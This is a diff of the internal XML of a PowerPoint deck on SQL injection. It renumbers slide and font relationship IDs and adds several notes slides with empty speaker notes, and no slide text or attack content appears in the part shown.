+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4036600180"/>
       </p:ext>
     </p:extLst>
   </p:cSld>

--- a/2025-10-21.PirlOverflow - SQL Injection crash(ed) course.pptx
+++ b/2025-10-21.PirlOverflow - SQL Injection crash(ed) course.pptx
@@ -5,7 +5,7 @@
     <p:sldMasterId id="2147483674" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId35"/>
+    <p:notesMasterId r:id="rId44"/>
   </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="256" r:id="rId2"/>
@@ -29,60 +29,69 @@
     <p:sldId id="272" r:id="rId20"/>
     <p:sldId id="278" r:id="rId21"/>
     <p:sldId id="295" r:id="rId22"/>
-    <p:sldId id="276" r:id="rId23"/>
+    <p:sldId id="307" r:id="rId23"/>
     <p:sldId id="277" r:id="rId24"/>
     <p:sldId id="280" r:id="rId25"/>
     <p:sldId id="279" r:id="rId26"/>
     <p:sldId id="281" r:id="rId27"/>
     <p:sldId id="299" r:id="rId28"/>
     <p:sldId id="282" r:id="rId29"/>
-    <p:sldId id="273" r:id="rId30"/>
-    <p:sldId id="285" r:id="rId31"/>
-    <p:sldId id="300" r:id="rId32"/>
-    <p:sldId id="258" r:id="rId33"/>
-    <p:sldId id="264" r:id="rId34"/>
+    <p:sldId id="302" r:id="rId30"/>
+    <p:sldId id="303" r:id="rId31"/>
+    <p:sldId id="305" r:id="rId32"/>
+    <p:sldId id="306" r:id="rId33"/>
+    <p:sldId id="304" r:id="rId34"/>
+    <p:sldId id="273" r:id="rId35"/>
+    <p:sldId id="310" r:id="rId36"/>
+    <p:sldId id="311" r:id="rId37"/>
+    <p:sldId id="309" r:id="rId38"/>
+    <p:sldId id="285" r:id="rId39"/>
+    <p:sldId id="300" r:id="rId40"/>
+    <p:sldId id="308" r:id="rId41"/>
+    <p:sldId id="258" r:id="rId42"/>
+    <p:sldId id="264" r:id="rId43"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
   <p:notesSz cx="6858000" cy="9144000"/>
   <p:embeddedFontLst>
     <p:embeddedFont>
       <p:font typeface="Anonymous Pro" panose="020B0604020202020204" charset="0"/>
-      <p:regular r:id="rId36"/>
-      <p:bold r:id="rId37"/>
-      <p:italic r:id="rId38"/>
-      <p:boldItalic r:id="rId39"/>
+      <p:regular r:id="rId45"/>
+      <p:bold r:id="rId46"/>
+      <p:italic r:id="rId47"/>
+      <p:boldItalic r:id="rId48"/>
     </p:embeddedFont>
     <p:embeddedFont>
       <p:font typeface="Barlow Condensed" panose="00000506000000000000" pitchFamily="2" charset="0"/>
-      <p:regular r:id="rId40"/>
-      <p:bold r:id="rId41"/>
-      <p:italic r:id="rId42"/>
-      <p:boldItalic r:id="rId43"/>
+      <p:regular r:id="rId49"/>
+      <p:bold r:id="rId50"/>
+      <p:italic r:id="rId51"/>
+      <p:boldItalic r:id="rId52"/>
     </p:embeddedFont>
     <p:embeddedFont>
       <p:font typeface="Barlow Condensed Light" panose="00000406000000000000" pitchFamily="2" charset="0"/>
-      <p:regular r:id="rId44"/>
-      <p:bold r:id="rId45"/>
-      <p:italic r:id="rId46"/>
-      <p:boldItalic r:id="rId47"/>
+      <p:regular r:id="rId53"/>
+      <p:bold r:id="rId54"/>
+      <p:italic r:id="rId55"/>
+      <p:boldItalic r:id="rId56"/>
     </p:embeddedFont>
     <p:embeddedFont>
       <p:font typeface="Barlow Condensed Medium" panose="00000606000000000000" pitchFamily="2" charset="0"/>
-      <p:regular r:id="rId48"/>
-      <p:bold r:id="rId49"/>
-      <p:italic r:id="rId50"/>
-      <p:boldItalic r:id="rId51"/>
+      <p:regular r:id="rId57"/>
+      <p:bold r:id="rId58"/>
+      <p:italic r:id="rId59"/>
+      <p:boldItalic r:id="rId60"/>
     </p:embeddedFont>
     <p:embeddedFont>
       <p:font typeface="Barlow Condensed SemiBold" panose="00000706000000000000" pitchFamily="2" charset="0"/>
-      <p:regular r:id="rId52"/>
-      <p:bold r:id="rId53"/>
-      <p:italic r:id="rId54"/>
-      <p:boldItalic r:id="rId55"/>
+      <p:regular r:id="rId61"/>
+      <p:bold r:id="rId62"/>
+      <p:italic r:id="rId63"/>
+      <p:boldItalic r:id="rId64"/>
     </p:embeddedFont>
     <p:embeddedFont>
       <p:font typeface="Comic Mono" pitchFamily="1" charset="0"/>
-      <p:regular r:id="rId56"/>
+      <p:regular r:id="rId65"/>
     </p:embeddedFont>
   </p:embeddedFontLst>
   <p:defaultTextStyle>
@@ -2537,7 +2546,7 @@
         <p:cNvPr id="1" name="Shape 124">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B2EE2A-2124-2E18-4598-603CBCEB2483}"/>
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD0A1EA5-23E6-F000-6691-F5015056D3D7}"/>
             </a:ext>
           </a:extLst>
         </p:cNvPr>
@@ -2557,7 +2566,7 @@
           <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B20E22D-A900-F2B9-C76C-309BF5F1DD81}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31FDCAEF-CB5B-379E-5977-701B1A97B95F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -2604,7 +2613,7 @@
           <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FA1860A-8401-80EC-B8C6-6461FB817836}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB985512-202D-1037-C3CD-669727EE31E9}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -2646,7 +2655,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3765613466"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2860206296"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -3426,7 +3435,7 @@
         <p:cNvPr id="1" name="Shape 124">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C6A6AF-A01B-5E3B-F81B-949E028DA209}"/>
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B9EFDD-426A-D616-1468-BFDC1B0DE87F}"/>
             </a:ext>
           </a:extLst>
         </p:cNvPr>
@@ -3446,7 +3455,7 @@
           <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C16E44-6EC6-B33F-A02B-CB02C3AE3F67}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05AF142E-017B-D673-C759-8412791088BF}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -3493,7 +3502,7 @@
           <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF8F337-7DE1-1854-0BAF-C04706A91970}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEFDB43B-4DFE-3F8A-75BF-5F8C2EB1E1C1}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -3535,7 +3544,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3717877283"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2734908796"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -3680,6 +3689,1022 @@
         <p:cNvPr id="1" name="Shape 124">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A01623F2-E7E1-443D-2A29-CBE4F5DA93DE}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1BB5F3-265F-75AF-4EAD-7E6C688D2909}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D73501C9-6ACA-D074-C1CD-BF5CD3EEAA38}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3636435271"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide31.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A393C12-2BE7-DC2A-E28A-A640C4FAEA93}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20ECE4B1-F0E1-124F-B3A6-35FDF870E838}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B96D3F2-C26D-FD91-1E18-C357571427EC}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1690209220"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide32.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86393912-73FA-26A0-0E20-BAA652FCF54A}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5520D353-D796-3329-1028-F0DBBF404886}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E115FD8C-C295-214E-3396-2C2EDD8E69AA}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3570056980"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide33.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{468101D0-04FA-7337-FB24-91A6951B255F}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F591E42-46A3-2A8F-1D38-E8025B879D57}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C826DB33-1E53-C9C3-5C95-FF7EB8A76076}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4262980871"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide34.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C6A6AF-A01B-5E3B-F81B-949E028DA209}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C16E44-6EC6-B33F-A02B-CB02C3AE3F67}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
